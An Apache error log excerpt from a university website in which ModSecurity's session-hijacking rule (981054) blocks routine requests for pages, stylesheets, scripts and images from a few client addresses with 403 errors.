[Mon Aug 28 08:37:19.355187 2023] [:error] [pid 38499] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv6T8Co-f0AAJZjwWIAAAAC"]
[Mon Aug 28 08:37:19.592003 2023] [:error] [pid 38503] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv6T8Co-f0AAJZnSYgAAAAB"]
[Mon Aug 28 08:37:32.208563 2023] [:error] [pid 38303] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv6XMCo-f0AAJWfZmAAAAAI"]
[Mon Aug 28 08:37:32.310597 2023] [:error] [pid 38539] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv6XMCo-f0AAJaL19gAAAAG"]
[Mon Aug 28 08:37:40.380111 2023] [:error] [pid 38114] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/index.php/user/ext_login"] [unique_id "ZOv6ZMCo-f0AAJTioHgAAAAE"]
[Mon Aug 28 08:37:40.499980 2023] [:error] [pid 38499] [client 112.215.209.96] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/favicon.ico"] [unique_id "ZOv6ZMCo-f0AAJZjwY8AAAAC"]
[Mon Aug 28 08:37:49.275014 2023] [:error] [pid 38303] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv6bcCo-f0AAJWfZoQAAAAI"]
[Mon Aug 28 08:37:49.276512 2023] [:error] [pid 38499] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv6bcCo-f0AAJZjwZ0AAAAC"]
[Mon Aug 28 08:37:49.312196 2023] [:error] [pid 38503] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv6bcCo-f0AAJZnSdoAAAAB"]
[Mon Aug 28 08:37:49.326204 2023] [:error] [pid 38539] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv6bcCo-f0AAJaL2AsAAAAG"]
[Mon Aug 28 08:37:49.326622 2023] [:error] [pid 38538] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv6bcCo-f0AAJaKUngAAAAF"]
[Mon Aug 28 08:37:49.334960 2023] [:error] [pid 38059] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv6bcCo-f0AAJSr3d0AAAAO"]
[Mon Aug 28 08:37:49.426868 2023] [:error] [pid 38539] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv6bcCo-f0AAJaL2AwAAAAG"]
[Mon Aug 28 08:37:49.431420 2023] [:error] [pid 38538] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv6bcCo-f0AAJaKUnkAAAAF"]
[Mon Aug 28 08:37:49.520744 2023] [:error] [pid 38503] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv6bcCo-f0AAJZnSdsAAAAB"]
[Mon Aug 28 08:37:49.534483 2023] [:error] [pid 38059] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv6bcCo-f0AAJSr3d4AAAAO"]
[Mon Aug 28 08:37:49.660350 2023] [:error] [pid 38059] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv6bcCo-f0AAJSr3d8AAAAO"]
[Mon Aug 28 08:37:49.661190 2023] [:error] [pid 38499] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv6bcCo-f0AAJZjwZ8AAAAC"]
[Mon Aug 28 08:37:49.763575 2023] [:error] [pid 38389] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv6bcCo-f0AAJX1lFoAAAAS"]
[Mon Aug 28 08:37:49.776909 2023] [:error] [pid 38499] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv6bcCo-f0AAJZjwaAAAAAC"]
[Mon Aug 28 08:37:49.779568 2023] [:error] [pid 38538] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv6bcCo-f0AAJaKUnsAAAAF"]
[Mon Aug 28 08:37:49.879680 2023] [:error] [pid 38502] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv6bcCo-f0AAJZmpPcAAAAA"]
[Mon Aug 28 08:37:49.892066 2023] [:error] [pid 38499] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv6bcCo-f0AAJZjwaEAAAAC"]
[Mon Aug 28 08:37:49.951600 2023] [:error] [pid 38059] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv6bcCo-f0AAJSr3eAAAAAO"]
[Mon Aug 28 08:37:49.952722 2023] [:error] [pid 38389] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv6bcCo-f0AAJX1lFsAAAAS"]
[Mon Aug 28 08:37:49.964938 2023] [:error] [pid 38502] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv6bcCo-f0AAJZmpPgAAAAA"]
[Mon Aug 28 08:37:49.965118 2023] [:error] [pid 38539] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv6bcCo-f0AAJaL2A0AAAAG"]
[Mon Aug 28 08:37:49.977134 2023] [:error] [pid 38499] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv6bcCo-f0AAJZjwaIAAAAC"]
[Mon Aug 28 08:37:49.995107 2023] [:error] [pid 38303] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv6bcCo-f0AAJWfZogAAAAI"]
[Mon Aug 28 08:37:50.080018 2023] [:error] [pid 38389] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv6bsCo-f0AAJX1lFwAAAAS"]
[Mon Aug 28 08:37:50.093011 2023] [:error] [pid 38538] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv6bsCo-f0AAJaKUn0AAAAF"]
[Mon Aug 28 08:37:50.093686 2023] [:error] [pid 38303] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv6bsCo-f0AAJWfZokAAAAI"]
[Mon Aug 28 08:37:50.094854 2023] [:error] [pid 38539] [client 103.174.222.2] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/rekrut_dosen.jpg"] [unique_id "ZOv6bsCo-f0AAJaL2A4AAAAG"]
[Mon Aug 28 08:38:07.598358 2023] [:error] [pid 38539] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_mastah/grid_vstsemester"] [unique_id "ZOv6f8Co-f0AAJaL2DsAAAAG"]
[Mon Aug 28 08:38:08.253336 2023] [:error] [pid 38065] [client 123.253.233.84] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "unla.ac.id"] [uri "/index.php/c_tools/get_user"] [unique_id "ZOv6gMCo-f0AAJSxZYwAAAAH"]
[Mon Aug 28 08:42:29.590997 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv7hcCo-f0AAJTioc8AAAAE"]
[Mon Aug 28 08:42:29.592811 2023] [:error] [pid 38065] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv7hcCo-f0AAJSxZxEAAAAH"]
[Mon Aug 28 08:42:29.595694 2023] [:error] [pid 38059] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv7hcCo-f0AAJSr3zIAAAAO"]
[Mon Aug 28 08:42:29.659779 2023] [:error] [pid 38538] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv7hcCo-f0AAJaKU9YAAAAF"]
[Mon Aug 28 08:42:29.662795 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/bootstrap.min.js"] [unique_id "ZOv7hcCo-f0AAJXyOiwAAAAM"]
[Mon Aug 28 08:42:29.672751 2023] [:error] [pid 38502] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/js/bootstrap-datepicker.js"] [unique_id "ZOv7hcCo-f0AAJZmpsIAAAAA"]
[Mon Aug 28 08:42:29.679647 2023] [:error] [pid 38059] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/bootstrap.min.css"] [unique_id "ZOv7hcCo-f0AAJSr3zMAAAAO"]
[Mon Aug 28 08:42:29.688259 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla.png"] [unique_id "ZOv7hcCo-f0AAJbPEMIAAAAC"]
[Mon Aug 28 08:42:29.693365 2023] [:error] [pid 38502] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/logo-unla-mobile.png"] [unique_id "ZOv7hcCo-f0AAJZmpsMAAAAA"]
[Mon Aug 28 08:42:29.695004 2023] [:error] [pid 38503] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/prof_hennie.png"] [unique_id "ZOv7hcCo-f0AAJZnSzAAAAAB"]
[Mon Aug 28 08:42:29.702523 2023] [:error] [pid 38538] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/bootstrap-datepicker/css/bootstrap-datepicker3.css"] [unique_id "ZOv7hcCo-f0AAJaKU9cAAAAF"]
[Mon Aug 28 08:42:29.704256 2023] [:error] [pid 38503] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/upacara_hutri2023.png"] [unique_id "ZOv7hcCo-f0AAJZnSzEAAAAB"]
[Mon Aug 28 08:42:29.707584 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/ratri_tiara2023.png"] [unique_id "ZOv7hcCo-f0AAJXyOi0AAAAM"]
[Mon Aug 28 08:42:29.712515 2023] [:error] [pid 38065] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/nurtriana.png"] [unique_id "ZOv7hcCo-f0AAJSxZxIAAAAH"]
[Mon Aug 28 08:42:29.718532 2023] [:error] [pid 38503] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/css/unla.css"] [unique_id "ZOv7hcCo-f0AAJZnSzIAAAAB"]
[Mon Aug 28 08:42:29.719299 2023] [:error] [pid 38065] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/img/ori/kampus_mengajar_2023.png"] [unique_id "ZOv7hcCo-f0AAJSxZxMAAAAH"]
[Mon Aug 28 08:42:29.725477 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fh-link.png"] [unique_id "ZOv7hcCo-f0AAJXyOi4AAAAM"]
[Mon Aug 28 08:42:29.728160 2023] [:error] [pid 38538] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fe-link.png"] [unique_id "ZOv7hcCo-f0AAJaKU9gAAAAF"]
[Mon Aug 28 08:42:29.737017 2023] [:error] [pid 38503] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fisip-link.png"] [unique_id "ZOv7hcCo-f0AAJZnSzMAAAAB"]
[Mon Aug 28 08:42:29.739105 2023] [:error] [pid 38114] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/fkip-link.png"] [unique_id "ZOv7hcCo-f0AAJTiodAAAAAE"]
[Mon Aug 28 08:42:29.741276 2023] [:error] [pid 38386] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/ft-link.png"] [unique_id "ZOv7hcCo-f0AAJXyOi8AAAAM"]
[Mon Aug 28 08:42:29.751849 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/js/jquery.min.js"] [unique_id "ZOv7hcCo-f0AAJbPEMMAAAAC"]
[Mon Aug 28 08:42:29.800481 2023] [:error] [pid 38065] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/pasca-link.png"] [unique_id "ZOv7hcCo-f0AAJSxZxQAAAAH"]
[Mon Aug 28 08:42:29.802648 2023] [:error] [pid 38502] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/akademik.png"] [unique_id "ZOv7hcCo-f0AAJZmpsQAAAAA"]
[Mon Aug 28 08:42:29.805258 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/common-web/gfx/theme1/banner/pendaftaran_online.png"] [unique_id "ZOv7hcCo-f0AAJbPEMQAAAAC"]
[Mon Aug 28 08:42:29.813238 2023] [:error] [pid 38059] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/login-email-unla.png"] [unique_id "ZOv7hcCo-f0AAJSr3zQAAAAO"]
[Mon Aug 28 08:42:29.815084 2023] [:error] [pid 38607] [client 203.176.176.235] ModSecurity: Access denied with code 403 (phase 1). Operator EQ matched 1 at SESSION:IS_NEW. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_16_session_hijacking.conf"] [line "24"] [id "981054"] [msg "Invalid SessionID Submitted."] [hostname "www.unla.ac.id"] [uri "/resources/dist/img/digilib-logo.png"] [unique_id "ZOv7hcCo-f0AAJbPEMUAAAAC"]
